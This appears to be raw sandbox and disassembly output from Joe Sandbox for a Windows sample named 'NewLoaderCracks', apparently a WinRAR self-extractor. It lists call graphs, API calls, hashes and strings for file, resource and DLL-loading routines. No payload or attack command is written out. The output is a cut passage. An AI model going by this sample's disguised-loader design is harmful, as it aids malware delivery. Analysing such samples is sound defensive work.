24489 54aa88 24457->24489 24459 543bf4 24459->24455 24459->24456 24460 543c12 24459->24460 24505 546dc1 74 API calls 24460->24505 24462 543cc4 24466 543d3e 24462->24466 24467 543d48 24462->24467 24493 5492e6 24466->24493 24513 5528f1 121 API calls 24467->24513 24470 543d46 24470->24472 24514 541f94 74 API calls 24470->24514 24515 551acf 24472->24515 24473->24433 24474->24435 24475->24431 24477 552c51 24476->24477 24479 552c5b 24476->24479 24522 546efd 75 API calls 24477->24522 24480 552ca2 ___std_exception_copy 24479->24480 24483 552c9d Concurrency::cancel_current_task 24479->24483 24488 552cfd ___scrt_fastfail 24479->24488 24481 552da9 Concurrency::cancel_current_task 24480->24481 24482 552cd9 24480->24482 24480->24488 24525 56157a RaiseException 24481->24525 24523 552b7b 75 API calls 4 library calls 24482->24523 24524 56157a RaiseException 24483->24524 24487 552dc1 24488->24459 24490 54aa95 24489->24490 24492 54aa9f 24489->24492 24491 55e24a new 8 API calls 24490->24491 24491->24492 24492->24462 24494 5492f0 __EH_prolog 24493->24494 24526 547dc6 24494->24526 24497 54709d 76 API calls 24498 549302 24497->24498 24529 54ca6c 24498->24529 24500 54935c 24500->24470 24502 54ca6c 114 API calls 24503 549314 24502->24503 24503->24500 24503->24502 24538 54cc51 97 API calls __vswprintf_c_l 24503->24538 24504->24452 24505->24472 24506->24455 24508 54c9c4 24507->24508 24509 54c9b2 24507->24509 24540 546249 80 API calls 24508->24540 24539 546249 80 API calls 24509->24539 24512 54c9bc 24512->24457 24513->24470 24514->24472 24516 551ad9 24515->24516 24517 551af2 24516->24517 24520 551b06 24516->24520 24541 55075b 84 API calls 24517->24541 24519 551af9 24519->24520 24521->24452 24522->24479 24523->24488 24524->24481 24525->24487 24527 54acf5 GetVersionExW 24526->24527 24528 547dcb 24527->24528 24528->24497 24535 54ca82 __vswprintf_c_l 24529->24535 24530 54cbf7 24531 54cc1f 24530->24531 24532 54ca0b 6 API calls 24530->24532 24533 55067c SetThreadExecutionState RaiseException 24531->24533 24532->24531 24536 54cbee 24533->24536 24534 5584bd 99 API calls 24534->24535 24535->24530 24535->24534 24535->24536 24537 54ab70 89 API calls 24535->24537 24536->24503 24537->24535 24538->24503 24539->24512 24540->24512 24541->24519 24542->24285 24543->24285 24544->24282 24546 545e4a 24545->24546 24586 545d67 24546->24586 24548 545e7d 24550 545eb5 24548->24550 24591 54ad65 CharUpperW CompareStringW 24548->24591 24550->24298 24552 548289 24551->24552 24597 55179d CharUpperW 24552->24597 24554 548333 24554->24301 24556 547d7b 24555->24556 24557 547dbb 24556->24557 24598 547043 74 API calls 24556->24598 24557->24313 24559 547db3 24599 546dc1 74 API calls 24559->24599 24561->24361 24563 549d73 24562->24563 24565 549d82 24562->24565 24564 549d79 FlushFileBuffers 24563->24564 24563->24565 24564->24565 24566 549dfb SetFileTime 24565->24566 24566->24366 24567->24289 24568->24291 24569->24294 24570->24313 24571->24313 24572->24306 24573->24321 24574->24312 24575->24321 24576->24331 24577->24333 24578->24334 24579->24357 24580->24357 24581->24357 24582->24357 24583->24357 24584->24360 24585->24369 24592 545c64 24586->24592 24588 545d88 24588->24548 24590 545c64 2 API calls 24590->24588 24591->24548 24593 545c6e 24592->24593 24595 545d56 24593->24595 24596 54ad65 CharUpperW CompareStringW 24593->24596 24595->24588 24595->24590 24596->24593 24597->24554 24598->24559 24599->24557 24601 54c8db 24600->24601 24606 54a90e 84 API calls 24601->24606 24603 54c90d 24607 54a90e 84 API calls 24603->24607 24605 54c918 24606->24603 24607->24605 24609 54a5fe 24608->24609 24610 54a691 FindNextFileW 24609->24610 24611 54a621 FindFirstFileW 24609->24611 24612 54a6b0 24610->24612 24613 54a69c GetLastError 24610->24613 24614 54a675 24611->24614 24615 54a638 24611->24615 24612->24614 24613->24612 24614->24236 24616 54b66c 2 API calls 24615->24616 24617 54a64d 24616->24617 24618 54a651 FindFirstFileW 24617->24618 24619 54a66a GetLastError 24617->24619 24618->24614 24618->24619 24619->24614 24620->24039 24621->24046 24622->24046 24623->24048 24624->24055 24626 549ef7 76 API calls 24625->24626 24627 541f5b 24626->24627 24628 5419a6 97 API calls 24627->24628 24631 541f78 24627->24631 24629 541f68 24628->24629 24629->24631 24632 546dc1 74 API calls 24629->24632 24631->24064 24631->24065 24632->24631 24799 55b8e0 93 API calls _swprintf 24800 558ce0 6 API calls 24803 5716e0 CloseHandle 24851 562397 48 API calls 24638 55d997 24639 55d89b 24638->24639 24640 55df59 ___delayLoadHelper2@8 19 API calls 24639->24640 24640->24639 24641 55d891 19 API calls ___delayLoadHelper2@8 24805 557090 114 API calls 24806 55cc90 70 API calls 24852 55a990 97 API calls 24853 559b90 GdipCloneImage GdipAlloc 24854 569b90 21 API calls 2 library calls 24808 55a89d 78 API calls 24809 54ea98 FreeLibrary 24647 541385 82 API calls 3 library calls 24856 565780 QueryPerformanceFrequency QueryPerformanceCounter 24857 5679b7 55 API calls _free 24812 5416b0 84 API calls 24718 5690b0 24726 56a56f 24718->24726 24721 5690c4 24723 5690cc 24724 5690d9 24723->24724 24734 5690e0 11 API calls 24723->24734 24727 56a458 ___FrameUnwindToState 5 API calls 24726->24727 24728 56a596 24727->24728 24729 56a5ae TlsAlloc 24728->24729 24732 56a59f 24728->24732 24729->24732 24730 55ec4a DloadUnlock 5 API calls 24731 5690ba 24730->24731 24731->24721 24733 569029 20 API calls 2 library calls 24731->24733 24732->24730 24733->24723 24734->24721 24735 56a3b0 24736 56a3bb 24735->24736 24738 56a3e4 24736->24738 24739 56a3e0 24736->24739 24741 56a6ca 24736->24741 24748 56a410 DeleteCriticalSection 24738->24748 24742 56a458 ___FrameUnwindToState 5 API calls 24741->24742 24743 56a6f1 24742->24743 24744 56a70f InitializeCriticalSectionAndSpinCount 24743->24744 24745 56a6fa 24743->24745 24744->24745 24746 55ec4a DloadUnlock 5 API calls 24745->24746 24747 56a726 24746->24747 24747->24736 24748->24739 24813 561eb0 6 API calls 4 library calls 24814 5676bd 52 API calls 3 library calls 24815 5496a0 79 API calls 24860 56e9a0 51 API calls 24818 55e4a2 38 API calls ___FrameUnwindToState

                Control-flow Graph

                APIs
                  • Part of subcall function 005500CF: GetModuleHandleW.KERNEL32(kernel32), ref: 005500E4
                  • Part of subcall function 005500CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005500F6
                  • Part of subcall function 005500CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00550127
                  • Part of subcall function 00559DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00559DAC
                  • Part of subcall function 0055A335: OleInitialize.OLE32(00000000), ref: 0055A34E
                  • Part of subcall function 0055A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0055A385
                  • Part of subcall function 0055A335: SHGetMalloc.SHELL32(00588430), ref: 0055A38F
                  • Part of subcall function 005513B3: GetCPInfo.KERNEL32(00000000,?), ref: 005513C4
                  • Part of subcall function 005513B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 005513D8
                • GetCommandLineW.KERNEL32 ref: 0055D61C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0055D643
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0055D654
                • UnmapViewOfFile.KERNEL32(00000000), ref: 0055D68E
                  • Part of subcall function 0055D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0055D29D
                  • Part of subcall function 0055D287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0055D2D9
                • CloseHandle.KERNEL32(00000000), ref: 0055D697
                • GetModuleFileNameW.KERNEL32(00000000,0059DC90,00000800), ref: 0055D6B2
                • SetEnvironmentVariableW.KERNEL32(sfxname,0059DC90), ref: 0055D6BE
                • GetLocalTime.KERNEL32(?), ref: 0055D6C9
                • _swprintf.LIBCMT ref: 0055D708
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0055D71A
                • GetModuleHandleW.KERNEL32(00000000), ref: 0055D721
                • LoadIconW.USER32(00000000,00000064), ref: 0055D738
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0055D789
                • Sleep.KERNEL32(?), ref: 0055D7B7
                • DeleteObject.GDI32 ref: 0055D7F0
                • DeleteObject.GDI32(?), ref: 0055D800
                • CloseHandle.KERNEL32 ref: 0055D843
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjY
                • API String ID: 788466649-1039780783
                • Opcode ID: c7676635e47b8b61c02e3a6bbd4132b975c0bd06f1687ea67ffe6361ee34b3d1
                • Instruction ID: baf1a75b4bb02c5186de6709b7f0b0889baea45ee2a4d3232826248e64c7f38b
                • Opcode Fuzzy Hash: c7676635e47b8b61c02e3a6bbd4132b975c0bd06f1687ea67ffe6361ee34b3d1
                • Instruction Fuzzy Hash: D961C772500241AFD720AB65EC5EF3A3FB8FB55746F40041AFD49A22A1EB74894CE772

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 770 559e1c-559e38 FindResourceW 771 559f2f-559f32 770->771 772 559e3e-559e50 SizeofResource 770->772 773 559e70-559e72 772->773 774 559e52-559e61 LoadResource 772->774 776 559f2e 773->776 774->773 775 559e63-559e6e LockResource 774->775 775->773 777 559e77-559e8c GlobalAlloc 775->777 776->771 778 559e92-559e9b GlobalLock 777->778 779 559f28-559f2d 777->779 780 559f21-559f22 GlobalFree 778->780 781 559ea1-559ebf call 55f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 559ec1-559ee3 call 559d7b 781->784 785 559f1a-559f1b GlobalUnlock 781->785 784->785 790 559ee5-559eed 784->790 785->780 791 559eef-559f03 GdipCreateHBITMAPFromBitmap 790->791 792 559f08-559f16 790->792 791->792 793 559f05 791->793 792->785 793->792
                APIs
                • FindResourceW.KERNEL32(0055AE4D,PNG,?,?,?,0055AE4D,00000066), ref: 00559E2E
                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0055AE4D,00000066), ref: 00559E46
                • LoadResource.KERNEL32(00000000,?,?,?,0055AE4D,00000066), ref: 00559E59
                • LockResource.KERNEL32(00000000,?,?,?,0055AE4D,00000066), ref: 00559E64
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0055AE4D,00000066), ref: 00559E82
                • GlobalLock.KERNEL32(00000000), ref: 00559E93
                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00559EB7
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00559EFC
                • GlobalUnlock.KERNEL32(00000000), ref: 00559F1B
                • GlobalFree.KERNEL32(00000000), ref: 00559F22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                • String ID: PNG
                • API String ID: 3656887471-364855578
                • Opcode ID: 05fb0c8aab3837211c76ff816449bb19fe5aa42a41fc6b3ec49a85357609c985
                • Instruction ID: f18a6fc08605290572156fc9c89bf0c470a76a54a76bd85d656e54c665b21588
                • Opcode Fuzzy Hash: 05fb0c8aab3837211c76ff816449bb19fe5aa42a41fc6b3ec49a85357609c985
                • Instruction Fuzzy Hash: A2318F75204302ABC7119F61EC5892BBFADFF95762B04052AFC06D2260DB35D848FA61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 966 54a5f4-54a61f call 55e360 969 54a691-54a69a FindNextFileW 966->969 970 54a621-54a632 FindFirstFileW 966->970 971 54a6b0-54a6b2 969->971 972 54a69c-54a6aa GetLastError 969->972 973 54a6b8-54a75c call 54fe56 call 54bcfb call 550e19 * 3 970->973 974 54a638-54a64f call 54b66c 970->974 971->973 975 54a761-54a774 971->975 972->971 973->975 981 54a651-54a668 FindFirstFileW 974->981 982 54a66a-54a673 GetLastError 974->982 981->973 981->982 984 54a684 982->984 985 54a675-54a678 982->985 987 54a686-54a68c 984->987 985->984 986 54a67a-54a67d 985->986 986->984 989 54a67f-54a682 986->989 987->975 989->987
                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0054A4EF,000000FF,?,?), ref: 0054A628
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0054A4EF,000000FF,?,?), ref: 0054A65E
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0054A4EF,000000FF,?,?), ref: 0054A66A
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,0054A4EF,000000FF,?,?), ref: 0054A692
                • GetLastError.KERNEL32(?,?,?,?,0054A4EF,000000FF,?,?), ref: 0054A69E
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: e6ad5b28a7f98bbdcba8ee9476873fce26598b77006b051a04d4b890748a202b
                • Instruction ID: 30a74b8b5eb4904db6a6402805706273e408dc41ac355cc681f40c3f028c46c6
                • Opcode Fuzzy Hash: e6ad5b28a7f98bbdcba8ee9476873fce26598b77006b051a04d4b890748a202b
                • Instruction Fuzzy Hash: 5E417671505242AFC364EF68C8C8ADAFBE8BF98354F05092AF599D3240D734A9589B52
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,00567513,00000000,0057BAD8,0000000C,0056766A,00000000,00000002,00000000), ref: 0056755E
                • TerminateProcess.KERNEL32(00000000,?,00567513,00000000,0057BAD8,0000000C,0056766A,00000000,00000002,00000000), ref: 00567565
                • ExitProcess.KERNEL32 ref: 00567577
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 813e085cd1aa31ade17fa8430bf075c4b4c690a55d250f9fc3d55e7b401b6315
                • Instruction ID: 5fdc2862835b5bb795cd3c1e4e37ffbd657aa872c513b32956cfed69fa4621ba
                • Opcode Fuzzy Hash: 813e085cd1aa31ade17fa8430bf075c4b4c690a55d250f9fc3d55e7b401b6315
                • Instruction Fuzzy Hash: D7E04631000508EBCF11AF64ED0CA483F29FB64355F008054F80A8B232CB35DE82FA40
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: 275794703be9647274187485092d47e02a50929de479083cc0020fe5d2fdd4ac
                • Instruction ID: 9bbead033c37b2a9c304670dd28da42c74715607b8d24ec5b513a725428405d0
                • Opcode Fuzzy Hash: 275794703be9647274187485092d47e02a50929de479083cc0020fe5d2fdd4ac
                • Instruction Fuzzy Hash: AE823D70904246AEDF25DF64C889BFEBFB9BF05308F0845B9ED599B142DB305A48CB60
                APIs
                • __EH_prolog.LIBCMT ref: 0055AEE5
                  • Part of subcall function 0054130B: GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                  • Part of subcall function 0054130B: SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-3870082069
                • Opcode ID: d7528e8d47d210e579575122d871253df8c7c3554568bb03c4a6747ec2c9acb3
                • Instruction ID: 62ecf1f17e64417365f55106590ec57a21c3a1fbd2730dfbe420c3ba0364a3e0
                • Opcode Fuzzy Hash: d7528e8d47d210e579575122d871253df8c7c3554568bb03c4a6747ec2c9acb3
                • Instruction Fuzzy Hash: 4742E3B1944245AAFB219BA49C5EFBE3F7CFB61706F400056FA05B60E1DBB4494CEB21

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 257 5500cf-5500ee call 55e360 GetModuleHandleW 260 550154-5503b2 257->260 261 5500f0-550107 GetProcAddress 257->261 262 550484-5504b3 GetModuleFileNameW call 54bc85 call 54fe56 260->262 263 5503b8-5503c3 call 5670dd 260->263 264 550121-550131 GetProcAddress 261->264 265 550109-55011f 261->265 279 5504b5-5504bf call 54acf5 262->279 263->262 273 5503c9-5503fa GetModuleFileNameW CreateFileW 263->273 264->260 268 550133-550152 264->268 265->264 268->260 276 5503fc-55040a SetFilePointer 273->276 277 550478-55047f CloseHandle 273->277 276->277 280 55040c-550429 ReadFile 276->280 277->262 285 5504c1-5504c5 call 550085 279->285 286 5504cc 279->286 280->277 282 55042b-550450 280->282 284 55046d-550476 call 54fbd8 282->284 284->277 291 550452-55046c call 550085 284->291 292 5504ca 285->292 289 5504ce-5504d0 286->289 293 5504f2-550518 call 54bcfb GetFileAttributesW 289->293 294 5504d2-5504f0 CompareStringW 289->294 291->284 292->289 297 55051a-55051e 293->297 301 550522 293->301 294->293 294->297 297->279 299 550520 297->299 302 550526-550528 299->302 301->302 303 550560-550562 302->303 304 55052a 302->304 306 55066f-550679 303->306 307 550568-55057f call 54bccf call 54acf5 303->307 305 55052c-550552 call 54bcfb GetFileAttributesW 304->305 313 550554-550558 305->313 314 55055c 305->314 317 5505e7-55061a call 54400a AllocConsole 307->317 318 550581-5505e2 call 550085 * 2 call 54ddd1 call 54400a call 54ddd1 call 559f35 307->318 313->305 316 55055a 313->316 314->303 316->303 323 550667-550669 ExitProcess 317->323 324 55061c-550661 GetCurrentProcessId AttachConsole call 5635b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 005500E4
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005500F6
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00550127
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 005503D4
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005503F0
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00550402
                • ReadFile.KERNEL32(00000000,?,00007FFE,00573BA4,00000000), ref: 00550421
                • CloseHandle.KERNEL32(00000000), ref: 00550479
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0055048F
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 005504E7
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00550510
                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0055054A
                  • Part of subcall function 00550085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005500A0
                  • Part of subcall function 00550085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0054EB86,Crypt32.dll,00000000,0054EC0A,?,?,0054EBEC,?,?,?), ref: 005500C2
                • _swprintf.LIBCMT ref: 005505BE
                • _swprintf.LIBCMT ref: 0055060A
                  • Part of subcall function 0054400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0054401D
                • AllocConsole.KERNEL32 ref: 00550612
                • GetCurrentProcessId.KERNEL32 ref: 0055061C
                • AttachConsole.KERNEL32(00000000), ref: 00550623
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00550649
                • WriteConsoleW.KERNEL32(00000000), ref: 00550650
                • Sleep.KERNEL32(00002710), ref: 0055065B
                • FreeConsole.KERNEL32 ref: 00550661
                • ExitProcess.KERNEL32 ref: 00550669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: <W$ ?W$(>W$(@W$0AW$4=W$8<W$<?W$@>W$@@W$D=W$DAW$DXGIDebug.dll$P<W$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;W$T?W$X>W$X@W$\AW$`=W$dwmapi.dll$kernel32$l<W$p>W$p?W$p@W$uxtheme.dll$x=W$|<W$>W$?W
                • API String ID: 1201351596-3621305052
                • Opcode ID: 8c716e16c611a1aa6b269e4e59232659e400b0ebd3c0421aa48d1a504c0e1d5a
                • Instruction ID: 437050f528a988146318b5279ca2eaa6281915d7c4656b0eb682980149d45a64
                • Opcode Fuzzy Hash: 8c716e16c611a1aa6b269e4e59232659e400b0ebd3c0421aa48d1a504c0e1d5a
                • Instruction Fuzzy Hash: 80D16DB1008385ABD7219F50A84DB9FBEE8BF84765F50891DF98D96180D7B0864CBF63

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 406 55bdf5-55be0d call 55e28c call 55e360 411 55ca90-55ca9d 406->411 412 55be13-55be3d call 55aa36 406->412 412->411 415 55be43-55be48 412->415 416 55be49-55be57 415->416 417 55be58-55be6d call 55a6c7 416->417 420 55be6f 417->420 421 55be71-55be86 call 5517ac 420->421 424 55be93-55be96 421->424 425 55be88-55be8c 421->425 427 55ca5c-55ca87 call 55aa36 424->427 428 55be9c 424->428 425->421 426 55be8e 425->426 426->427 427->416 439 55ca8d-55ca8f 427->439 430 55c115-55c117 428->430 431 55c074-55c076 428->431 432 55bea3-55bea6 428->432 433 55c132-55c134 428->433 430->427 435 55c11d-55c12d SetWindowTextW 430->435 431->427 437 55c07c-55c088 431->437 432->427 438 55beac-55bf06 call 559da4 call 54b965 call 54a49d call 54a5d7 call 5470bf 432->438 433->427 436 55c13a-55c141 433->436 435->427 436->427 440 55c147-55c160 436->440 441 55c09c-55c0a1 437->441 442 55c08a-55c09b call 567168 437->442 494 55c045-55c05a call 54a52a 438->494 439->411 444 55c162 440->444 445 55c168-55c176 call 5635b3 440->445 448 55c0a3-55c0a9 441->448 449 55c0ab-55c0b6 call 55ab9a 441->449 442->441 444->445 445->427 462 55c17c-55c185 445->462 453 55c0bb-55c0bd 448->453 449->453 455 55c0bf-55c0c6 call 5635b3 453->455 456 55c0c8-55c0e8 call 5635b3 call 5635de 453->456 455->456 481 55c101-55c103 456->481 482 55c0ea-55c0f1 456->482 466 55c187-55c18b 462->466 467 55c1ae-55c1b1 462->467 466->467 472 55c18d-55c195 466->472 469 55c1b7-55c1ba 467->469 470 55c296-55c2a4 call 54fe56 467->470 475 55c1c7-55c1e2 469->475 476 55c1bc-55c1c1 469->476 491 55c2a6-55c2ba call 5617cb 470->491 472->427 479 55c19b-55c1a9 call 54fe56 472->479 495 55c1e4-55c21e 475->495 496 55c22c-55c233 475->496 476->470 476->475 479->491 481->427 490 55c109-55c110 call 5635ce 481->490 488 55c0f3-55c0f5 482->488 489 55c0f8-55c100 call 567168 482->489 488->489 489->481 490->427 505 